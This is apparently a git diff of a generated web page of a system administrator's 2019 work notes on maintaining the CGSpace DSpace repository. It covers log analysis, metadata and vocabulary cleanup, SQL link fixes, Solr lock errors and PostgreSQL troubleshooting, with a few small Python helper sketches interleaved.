    • I will merge them with our existing list and then resolve their names using my resolve-orcids.py script:
    -
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml 2019-02-18-IWMI-ORCID-IDs.txt  | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2019-02-18-combined-orcids.txt
    +
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml 2019-02-18-IWMI-ORCID-IDs.txt  | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2019-02-18-combined-orcids.txt
     $ ./resolve-orcids.py -i /tmp/2019-02-18-combined-orcids.txt -o /tmp/2019-02-18-combined-names.txt -d
     # sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
     $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
    @@ -956,7 +956,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
     
  • Unfortunately, I don’t see any strange activity in the web server API or XMLUI logs at that time in particular
  • So far today the top ten IPs in the XMLUI logs are:
  • -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "19/Feb/2019:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "19/Feb/2019:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
       11541 18.212.208.240
       11560 3.81.136.184
       11562 3.88.237.84
    @@ -978,7 +978,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
     
     
  • The top IPs in the API logs today are:
  • -
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "19/Feb/2019:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "19/Feb/2019:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          42 66.249.66.221
          44 156.156.81.215
          55 3.85.54.129
    @@ -999,17 +999,17 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
     
  • I need to follow up with the DSpace developers and Atmire to see how they classify which requests are bots so we can try to estimate the impact caused by these users and perhaps try to update the list to make the stats more accurate
  • I found one IP address in Nigeria that has an Android user agent and has requested a bitstream from 10568/96140 almost 200 times:
  • -
    # grep 41.190.30.105 /var/log/nginx/access.log | grep -c 'acgg_progress_report.pdf'
    +
    # grep 41.190.30.105 /var/log/nginx/access.log | grep -c 'acgg_progress_report.pdf'
     185
     
    • Wow, and another IP in Nigeria made a bunch more yesterday from the same user agent:
    -
    # grep 41.190.3.229 /var/log/nginx/access.log.1 | grep -c 'acgg_progress_report.pdf'
    +
    # grep 41.190.3.229 /var/log/nginx/access.log.1 | grep -c 'acgg_progress_report.pdf'
     346
     
    • In the last two days alone there were 1,000 requests for this PDF, mostly from Nigeria!
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep acgg_progress_report.pdf | grep -v 'upstream response is buffered' | awk '{print $1}' | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep acgg_progress_report.pdf | grep -v 'upstream response is buffered' | awk '{print $1}' | sort | uniq -c | sort -n
           1 139.162.146.60
           1 157.55.39.159
           1 196.188.127.94
    @@ -1042,9 +1042,9 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
     
  • I told him that they should probably try to use the REST API’s find-by-metadata-field endpoint
  • The annoying thing is that you have to match the text language attribute of the field exactly, but it does work:
  • -
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://cgspace.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.creator.id","value": "Alan S. Orth: 0000-0002-1735-7458", "language": ""}'
    -$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://cgspace.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.creator.id","value": "Alan S. Orth: 0000-0002-1735-7458", "language": null}'
    -$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://cgspace.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.creator.id","value": "Alan S. Orth: 0000-0002-1735-7458", "language": "en_US"}'
    +
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://cgspace.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.creator.id","value": "Alan S. Orth: 0000-0002-1735-7458", "language": ""}'
    +$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://cgspace.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.creator.id","value": "Alan S. Orth: 0000-0002-1735-7458", "language": null}'
    +$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://cgspace.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.creator.id","value": "Alan S. Orth: 0000-0002-1735-7458", "language": "en_US"}'
     
    • This returns six items for me, which is the same number I see in a Discovery search
    • Hector Tobon from CIAT asked if it was possible to get item statistics from CGSpace so I told him to use my dspace-statistics-api
    • @@ -1075,7 +1075,7 @@ $ ./agrovoc-lookup.py -l fr -i /tmp/top-1500-subjects.txt -om /tmp/matched-subje
    $ sort /tmp/top-1500-subjects.txt > /tmp/subjects-sorted.txt
     $ comm -13 /tmp/2019-02-21-matched-subjects.txt /tmp/subjects-sorted.txt > /tmp/2019-02-21-unmatched-subjects.txt
    -$ diff --new-line-format="" --unchanged-line-format="" /tmp/subjects-sorted.txt /tmp/2019-02-21-matched-subjects.txt > /tmp/2019-02-21-unmatched-subjects.txt
    +$ diff --new-line-format="" --unchanged-line-format="" /tmp/subjects-sorted.txt /tmp/2019-02-21-matched-subjects.txt > /tmp/2019-02-21-unmatched-subjects.txt
     
    • Generate a list of countries and regions from CGSpace for Sisay to look through:
    @@ -1129,15 +1129,15 @@ import re import urllib import urllib2 -pattern = re.compile('^S[A-Z ]+$') +pattern = re.compile('^S[A-Z ]+$') if pattern.match(value): - url = 'http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=' + urllib.quote_plus(value) + '&lang=en' + url = 'http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=' + urllib.quote_plus(value) + '&lang=en' get = urllib2.urlopen(url) data = json.load(get) - if len(data['results']) == 1: - return "matched" + if len(data['results']) == 1: + return "matched" -return "unmatched" +return "unmatched"
    • You have to make sure to URL encode the value with quote_plus() and it totally works, but it seems to refresh the facets (and therefore re-query everything) when you select a facet so that makes it basically unusable
    • There is a good resource discussing OpenRefine, Jython, and web scraping
    • @@ -1148,16 +1148,16 @@ return "unmatched"
    • I’m not sure how to deal with terms like “CORN” that are alternative labels (altLabel) in AGROVOC where the preferred label (prefLabel) would be “MAIZE”
    • For example, a query for CORN* returns:
    -
        "results": [
    +
        "results": [
             {
    -            "altLabel": "corn (maize)",
    -            "lang": "en",
    -            "prefLabel": "maize",
    -            "type": [
    -                "skos:Concept"
    +            "altLabel": "corn (maize)",
    +            "lang": "en",
    +            "prefLabel": "maize",
    +            "type": [
    +                "skos:Concept"
                 ],
    -            "uri": "http://aims.fao.org/aos/agrovoc/c_12332",
    -            "vocab": "agrovoc"
    +            "uri": "http://aims.fao.org/aos/agrovoc/c_12332",
    +            "vocab": "agrovoc"
             },
     
    • There are dozens of other entries like “corn (soft wheat)”, “corn (zea)”, “corn bran”, “Cornales”, etc that could potentially match, and determining programmatically whether they are related is difficult
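A minimal sketch of one way to separate the easy cases from the ambiguous ones, assuming each search result has the shape shown above (string `prefLabel`, optional string `altLabel`). The `classify` function and its three status names are hypothetical, not part of AGROVOC or of my lookup script. It treats an alternative label as a candidate only when it equals the term or is the term followed by a parenthesised qualifier, and it returns the preferred labels for manual review rather than picking one.

```python
def classify(term, results):
    """Return (status, preferred_labels) for a subject term.

    status is 'preferred' when the term is itself a prefLabel,
    'alternative' when it only appears as an altLabel (possibly with a
    qualifier such as "corn (maize)"), and 'unmatched' otherwise.
    """
    wanted = term.strip().lower()

    preferred = {
        r["prefLabel"]
        for r in results
        if r.get("prefLabel", "").lower() == wanted
    }
    if preferred:
        return "preferred", sorted(preferred)

    candidates = set()
    for r in results:
        alt = r.get("altLabel", "").lower()
        # Accept "corn" and "corn (maize)", but not "corn bran" or "cornales".
        if "prefLabel" in r and (alt == wanted or alt.startswith(wanted + " (")):
            candidates.add(r["prefLabel"])
    if candidates:
        return "alternative", sorted(candidates)

    return "unmatched", []


# The single result quoted above for the query CORN*.
results = [
    {
        "altLabel": "corn (maize)",
        "lang": "en",
        "prefLabel": "maize",
        "type": ["skos:Concept"],
        "uri": "http://aims.fao.org/aos/agrovoc/c_12332",
        "vocab": "agrovoc",
    }
]

print(classify("CORN", results))
```

When several qualified alternative labels match, the returned list has more than one preferred label, which is the signal that a human still needs to decide.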
    • @@ -1239,12 +1239,12 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111) at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528) ... 33 more -2019-02-25 21:38:14,250 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2015': Unable to create core [statistics-2015] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock +2019-02-25 21:38:14,250 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2015': Unable to create core [statistics-2015] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock
    • I tried to shutdown Tomcat and remove the locks:
    # systemctl stop tomcat7
    -# find /home/cgspace.cgiar.org/solr -iname "*.lock" -delete
    +# find /home/cgspace.cgiar.org/solr -iname "*.lock" -delete
     # systemctl start tomcat7
     
    • … but the problem still occurs
    • diff --git a/docs/2019-03/index.html b/docs/2019-03/index.html index 574908e77..3872bc8ec 100644 --- a/docs/2019-03/index.html +++ b/docs/2019-03/index.html @@ -46,7 +46,7 @@ Most worryingly, there are encoding errors in the abstracts for eleven items, fo I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs "/> - + @@ -217,7 +217,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.x
    -
    # journalctl -u tomcat7 | grep -c 'Multiple update components target the same field:solr_update_time_stamp'
    +
    # journalctl -u tomcat7 | grep -c 'Multiple update components target the same field:solr_update_time_stamp'
     1076
     
    • I restarted Tomcat and it’s OK now…
    • @@ -238,13 +238,13 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.x
    • The FireOak report highlights the fact that several CGSpace collections have mixed-content errors due to the use of HTTP links in the Feedburner forms
    • I see 46 occurrences of these with this query:
    -
    dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id in (3,4) AND (text_value LIKE '%http://feedburner.%' OR text_value LIKE '%http://feeds.feedburner.%');
    +
    dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id in (3,4) AND (text_value LIKE '%http://feedburner.%' OR text_value LIKE '%http://feeds.feedburner.%');
     
    • I can replace these globally using the following SQL:
    -
    dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feedburner.','https://feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feedburner.%';
    +
    dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feedburner.','https://feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feedburner.%';
     UPDATE 43
    -dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feeds.feedburner.','https://feeds.feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feeds.feedburner.%';
    +dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feeds.feedburner.','https://feeds.feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feeds.feedburner.%';
     UPDATE 44
     
    • I ran the corrections on CGSpace and DSpace Test
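For checking a rewrite like this before touching the database, here is a small Python sketch of the same substitution. It is an illustration under assumptions, not what was run: `upgrade_feedburner_links` is a hypothetical name and the sample HTML is made up. Two details matter: the dots are escaped, because an unescaped `.` in a regular expression matches any character, and the replacement scheme is written in full as `https://`.

```python
import re

# Matches http://feedburner. and http://feeds.feedburner. with literal dots.
FEEDBURNER_HTTP = re.compile(r"http://((?:feeds\.)?feedburner\.)")


def upgrade_feedburner_links(text: str) -> str:
    """Rewrite plain-HTTP Feedburner links to HTTPS, leaving other URLs alone."""
    return FEEDBURNER_HTTP.sub(r"https://\1", text)


# Hypothetical collection sidebar markup, for illustration only.
sample = (
    '<form action="http://feedburner.google.com/fb/a/mailverify">'
    '<a href="http://feeds.feedburner.com/example">RSS</a>'
    '<a href="http://example.org/">other</a>'
)

print(upgrade_feedburner_links(sample))
```

Running the function twice gives the same result as running it once, since already-upgraded links no longer match the pattern.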
    • @@ -254,7 +254,7 @@ UPDATE 44
    • Working on tagging IITA’s items with their new research theme (cg.identifier.iitatheme) based on their existing IITA subjects (see notes from 2019-02)
    • I exported the entire IITA community from CGSpace and then used csvcut to extract only the needed fields:
    -
    $ csvcut -c 'id,cg.subject.iita,cg.subject.iita[],cg.subject.iita[en],cg.subject.iita[en_US]' ~/Downloads/10568-68616.csv > /tmp/iita.csv
    +
    $ csvcut -c 'id,cg.subject.iita,cg.subject.iita[],cg.subject.iita[en],cg.subject.iita[en_US]' ~/Downloads/10568-68616.csv > /tmp/iita.csv
     
    • After importing to OpenRefine I realized that tagging items based on their subjects is tricky because of the row/record mode of OpenRefine when you split the multi-value cells as well as the fact that some items might need to be tagged twice (thus needing a ||)

      @@ -263,7 +263,7 @@ UPDATE 44

      I think it might actually be easier to filter by IITA subject, then by IITA theme (if needed), and then do transformations with some conditional values in GREL expressions like:

    -
    if(isBlank(value), 'PLANT PRODUCTION & HEALTH', value + '||PLANT PRODUCTION & HEALTH')
    +
    if(isBlank(value), 'PLANT PRODUCTION & HEALTH', value + '||PLANT PRODUCTION & HEALTH')
     
    • Then it’s more annoying because there are four IITA subject columns…
    • In total this would add research themes to 1,755 items
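The conditional in the GREL expression above can be sketched in Python to make the `||` handling explicit. This assumes that GREL's `isBlank` is true only for a missing value or an empty string; `append_theme` is a hypothetical helper, and "BIOSCIENCE" is a made-up existing value used purely for illustration.

```python
THEME = "PLANT PRODUCTION & HEALTH"


def append_theme(value, theme=THEME, separator="||"):
    """Set the theme on an empty cell, or append it as an extra value."""
    if value is None or value == "":
        return theme
    return value + separator + theme


print(append_theme(""))            # empty cell gets the theme on its own
print(append_theme("BIOSCIENCE"))  # existing value keeps its place before ||
```

Like the GREL version, this does not check whether the theme is already present, so it should only be applied once per filtered set of rows.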
    • @@ -288,11 +288,11 @@ UPDATE 44
    • This is a bit ugly, but it works (using the DSpace 5 SQL helper function to resolve ID to handle):
    -
    for id in $(psql -U postgres -d dspacetest -h localhost -c "SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228 AND text_value LIKE '%SWAZILAND%'" | grep -oE '[0-9]{3,}'); do
    +
    for id in $(psql -U postgres -d dspacetest -h localhost -c "SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228 AND text_value LIKE '%SWAZILAND%'" | grep -oE '[0-9]{3,}'); do
     
    -    echo "Getting handle for id: ${id}"
    +    echo "Getting handle for id: ${id}"
     
    -    handle=$(psql -U postgres -d dspacetest -h localhost -c "SELECT ds5_item2itemhandle($id)" | grep -oE '[0-9]{5}/[0-9]+')
    +    handle=$(psql -U postgres -d dspacetest -h localhost -c "SELECT ds5_item2itemhandle($id)" | grep -oE '[0-9]{5}/[0-9]+')
     
         ~/dspace/bin/dspace metadata-export -f /tmp/${id}.csv -i $handle
     
    @@ -300,7 +300,7 @@ done
     
    • Then I couldn’t figure out a clever way to join all the CSVs, so I just grepped them to find the IDs with dates from 2018 and 2019 and there are apparently only three:
    -
    $ grep -oE '201[89]' /tmp/*.csv | sort -u
    +
    $ grep -oE '201[89]' /tmp/*.csv | sort -u
     /tmp/94834.csv:2018
     /tmp/95615.csv:2018
     /tmp/96747.csv:2018
    @@ -326,7 +326,7 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is c
     
    • Interestingly, I see a pattern of these errors increasing, with single and double digit numbers over the past month, but spikes of over 1,000 today, yesterday, and on 2019-03-08, which was exactly the first time we saw this blank page error recently
    -
    $ grep -I 'SQL QueryTable Error' dspace.log.2019-0* | awk -F: '{print $1}' | sort | uniq -c | tail -n 25
    +
    $ grep -I 'SQL QueryTable Error' dspace.log.2019-0* | awk -F: '{print $1}' | sort | uniq -c | tail -n 25
           5 dspace.log.2019-02-27
          11 dspace.log.2019-02-28
          29 dspace.log.2019-03-01
    @@ -356,7 +356,7 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is c
     
  • (Update on 2019-03-23 to use correct grep query)
  • There are not too many connections currently in PostgreSQL:
  • -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           6 dspaceApi
          10 dspaceCli
          15 dspaceWeb
    @@ -437,13 +437,13 @@ java.util.EmptyStackException
     
  • I ran DSpace’s cleanup task on CGSpace (linode18) and there were errors:
  • $ dspace cleanup -v
    -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(164496) is still referenced from table "bundle".
    +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(164496) is still referenced from table "bundle".
     
    • The solution is, as always:
    # su - postgres
    -$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (164496);'
    +$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (164496);'
     UPDATE 1
     

    2019-03-18

      @@ -474,7 +474,7 @@ $ wc -l 2019-03-18-subjects-unmatched.txt
    • Create and merge a pull request to update the controlled vocabulary for AGROVOC terms (#416)
    • We are getting the blank page issue on CGSpace again today and I see a large number of the “SQL QueryTable Error” in the DSpace log again (last time was 2019-03-15):
    -
    $ grep -c 'SQL QueryTable Error' dspace.log.2019-03-1[5678]
    +
    $ grep -c 'SQL QueryTable Error' dspace.log.2019-03-1[5678]
     dspace.log.2019-03-15:929
     dspace.log.2019-03-16:67
     dspace.log.2019-03-17:72
    @@ -482,9 +482,9 @@ dspace.log.2019-03-18:1038
     
    • Though WTF, this grep seems to be giving weird inaccurate results actually, and the real number of errors is much lower if I exclude the “binary file matches” result with -I:
    -
    $ grep -I 'SQL QueryTable Error' dspace.log.2019-03-18 | wc -l
    +
    $ grep -I 'SQL QueryTable Error' dspace.log.2019-03-18 | wc -l
     8
    -$ grep -I 'SQL QueryTable Error' dspace.log.2019-03-{08,14,15,16,17,18} | awk -F: '{print $1}' | sort | uniq -c
    +$ grep -I 'SQL QueryTable Error' dspace.log.2019-03-{08,14,15,16,17,18} | awk -F: '{print $1}' | sort | uniq -c
           9 dspace.log.2019-03-08
          25 dspace.log.2019-03-14
          12 dspace.log.2019-03-15
    @@ -504,22 +504,22 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@75eaa668 is c
     
    • There is a low number of connections to PostgreSQL currently:
    -
    $ psql -c 'select * from pg_stat_activity' | wc -l
    +
    $ psql -c 'select * from pg_stat_activity' | wc -l
     33
    -$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           6 dspaceApi
           7 dspaceCli
          15 dspaceWeb
     
    • I looked in the PostgreSQL logs, but all I see are a bunch of these errors going back two months to January:
    -
    2019-01-13 06:25:13.062 CET [9157] postgres@template1 ERROR:  column "waiting" does not exist at character 217
    +
    2019-01-13 06:25:13.062 CET [9157] postgres@template1 ERROR:  column "waiting" does not exist at character 217
     
    • This is unrelated and apparently due to Munin checking a column that was changed in PostgreSQL 9.6
    • I suspect that this issue with the blank pages might not be PostgreSQL after all, perhaps it’s a Cocoon thing?
    • Looking in the cocoon logs I see a large number of warnings about “Can not load requested doc” around 11AM and 12PM:
    -
    $ grep 'Can not load requested doc' cocoon.log.2019-03-18 | grep -oE '2019-03-18 [0-9]{2}:' | sort | uniq -c
    +
    $ grep 'Can not load requested doc' cocoon.log.2019-03-18 | grep -oE '2019-03-18 [0-9]{2}:' | sort | uniq -c
           2 2019-03-18 00:
           6 2019-03-18 02:
           3 2019-03-18 04:
    @@ -535,7 +535,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
     
    • And a few days ago on 2019-03-15, when it last happened, it was in the afternoon, and the same pattern occurs then around 1–2PM:
    -
    $ xzgrep 'Can not load requested doc' cocoon.log.2019-03-15.xz | grep -oE '2019-03-15 [0-9]{2}:' | sort | uniq -c
    +
    $ xzgrep 'Can not load requested doc' cocoon.log.2019-03-15.xz | grep -oE '2019-03-15 [0-9]{2}:' | sort | uniq -c
           4 2019-03-15 01:
           3 2019-03-15 02:
           1 2019-03-15 03:
    @@ -561,7 +561,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
     
    • And again on 2019-03-08, surprise surprise, it happened in the morning:
    -
    $ xzgrep 'Can not load requested doc' cocoon.log.2019-03-08.xz | grep -oE '2019-03-08 [0-9]{2}:' | sort | uniq -c
    +
    $ xzgrep 'Can not load requested doc' cocoon.log.2019-03-08.xz | grep -oE '2019-03-08 [0-9]{2}:' | sort | uniq -c
          11 2019-03-08 01:
           3 2019-03-08 02:
           1 2019-03-08 03:
    @@ -581,7 +581,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
     
  • I found a handful of AGROVOC subjects that use a non-breaking space (0x00a0) instead of a regular space, which makes for some pretty confusing debugging…
  • I will replace these in the database immediately to save myself the headache later:
  • -
    dspace=# SELECT count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = 57 AND text_value ~ '.+\u00a0.+';
    +
    dspace=# SELECT count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = 57 AND text_value ~ '.+\u00a0.+';
      count 
     -------
         84
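
For checking values outside the database (for example in an exported CSV), a non-breaking space can be detected and replaced with a few lines of Python. This is only a sketch: the helper names are hypothetical and the sample term is made up for illustration, not one of the 84 affected values.

```python
NBSP = "\u00a0"  # non-breaking space, looks identical to " " in most fonts


def has_nbsp(value):
    """Return True if the value contains at least one non-breaking space."""
    return NBSP in value


def normalize_spaces(value):
    """Replace every non-breaking space with a regular space."""
    return value.replace(NBSP, " ")


# Hypothetical subject term containing a non-breaking space.
term = "FOOD" + NBSP + "SECURITY"
print(has_nbsp(term), repr(normalize_spaces(term)))
```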
    @@ -630,7 +630,7 @@ Max realtime timeout      unlimited            unlimited            us
     
  • For now I will just stop Tomcat, delete Solr locks, then start Tomcat again:
  • # systemctl stop tomcat7
    -# find /home/cgspace.cgiar.org/solr/ -iname "*.lock" -delete
    +# find /home/cgspace.cgiar.org/solr/ -iname "*.lock" -delete
     # systemctl start tomcat7
     
    • After restarting I confirmed that all Solr statistics cores were loaded successfully…
    • @@ -660,10 +660,10 @@ Max realtime timeout unlimited unlimited us
      • It’s been two days since we had the blank page issue on CGSpace, and looking in the Cocoon logs I see very low numbers of the errors that we were seeing the last time the issue occurred:
      -
      $ grep 'Can not load requested doc' cocoon.log.2019-03-20 | grep -oE '2019-03-20 [0-9]{2}:' | sort | uniq -c
      +
      $ grep 'Can not load requested doc' cocoon.log.2019-03-20 | grep -oE '2019-03-20 [0-9]{2}:' | sort | uniq -c
             3 2019-03-20 00:
            12 2019-03-20 02:
      -$ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21 [0-9]{2}:' | sort | uniq -c
      +$ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21 [0-9]{2}:' | sort | uniq -c
             4 2019-03-21 00:
             1 2019-03-21 02:
             4 2019-03-21 03:
      @@ -704,7 +704,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21
       
      • CGSpace (linode18) is having the blank page issue again and it seems to have started last night around 21:00:
      -
      $ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 [0-9]{2}:' | sort | uniq -c
      +
      $ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 [0-9]{2}:' | sort | uniq -c
             2 2019-03-22 00:
            69 2019-03-22 01:
             1 2019-03-22 02:
      @@ -727,7 +727,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21
           323 2019-03-22 21:
           685 2019-03-22 22:
           357 2019-03-22 23:
      -$ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23 [0-9]{2}:' | sort | uniq -c
      +$ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23 [0-9]{2}:' | sort | uniq -c
           575 2019-03-23 00:
           445 2019-03-23 01:
           518 2019-03-23 02:
      @@ -742,7 +742,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23
       
    • I was curious to see if clearing the Cocoon cache in the XMLUI control panel would fix it, but it didn’t
    • Trying to drill down more, I see that the bulk of the errors started around 21:20:
    -
    $ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 21:[0-9]' | sort | uniq -c
    +
    $ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 21:[0-9]' | sort | uniq -c
           1 2019-03-22 21:0
           1 2019-03-22 21:1
          59 2019-03-22 21:2
    @@ -850,12 +850,12 @@ org.postgresql.util.PSQLException: This statement has been closed.
     
    • Could be an error in the docs, as I see the Apache Commons DBCP has -1 as the default
    • Maybe I need to re-evaluate the “defaults” of Tomcat 7’s DBCP and set them explicitly in our config
    • -
    • From Tomcat 8 they seem to default to Apache Commons' DBCP 2.x
    • +
    • From Tomcat 8 they seem to default to Apache Commons’ DBCP 2.x
  • Also, CGSpace doesn’t have many Cocoon errors yet this morning:
  • -
    $ grep 'Can not load requested doc' cocoon.log.2019-03-25 | grep -oE '2019-03-25 [0-9]{2}:' | sort | uniq -c
    +
    $ grep 'Can not load requested doc' cocoon.log.2019-03-25 | grep -oE '2019-03-25 [0-9]{2}:' | sort | uniq -c
           4 2019-03-25 00:
           1 2019-03-25 01:
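
The per-hour tallies of Cocoon warnings used throughout these notes could also be computed in Python. This is a rough sketch of the `grep | grep -oE | sort | uniq -c` pipeline: the function name `count_by_hour` is hypothetical and the sample lines only imitate the timestamp prefix, they are not real Cocoon log entries.

```python
import re
from collections import Counter

# Matches the "YYYY-MM-DD HH:" prefix that the grep -oE pattern extracts.
HOUR_RE = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:")


def count_by_hour(lines, needle="Can not load requested doc"):
    """Count lines containing the needle, grouped by their date and hour."""
    counts = Counter()
    for line in lines:
        if needle in line:
            match = HOUR_RE.search(line)
            if match:
                counts[match.group(0)] += 1
    return counts


# Made-up lines for illustration only.
sample = [
    "2019-03-25 00:12:01,123 WARN Can not load requested doc: example",
    "2019-03-25 00:40:10,456 WARN Can not load requested doc: example",
    "2019-03-25 01:05:33,789 WARN Can not load requested doc: example",
    "2019-03-25 01:06:00,000 INFO something unrelated",
]
for hour, count in sorted(count_by_hour(sample).items()):
    print(f"{count:7d} {hour}")
```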
     
      @@ -869,7 +869,7 @@ org.postgresql.util.PSQLException: This statement has been closed.
    • Uptime Robot reported that CGSpace went down and I see the load is very high
    • The top IPs around the time in the nginx API and web logs were:
    -
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "25/Mar/2019:(18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "25/Mar/2019:(18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           9 190.252.43.162
          12 157.55.39.140
          18 157.55.39.54
    @@ -880,7 +880,7 @@ org.postgresql.util.PSQLException: This statement has been closed.
          36 157.55.39.9
          50 52.23.239.229
        2380 45.5.186.2
    -# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "25/Mar/2019:(18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
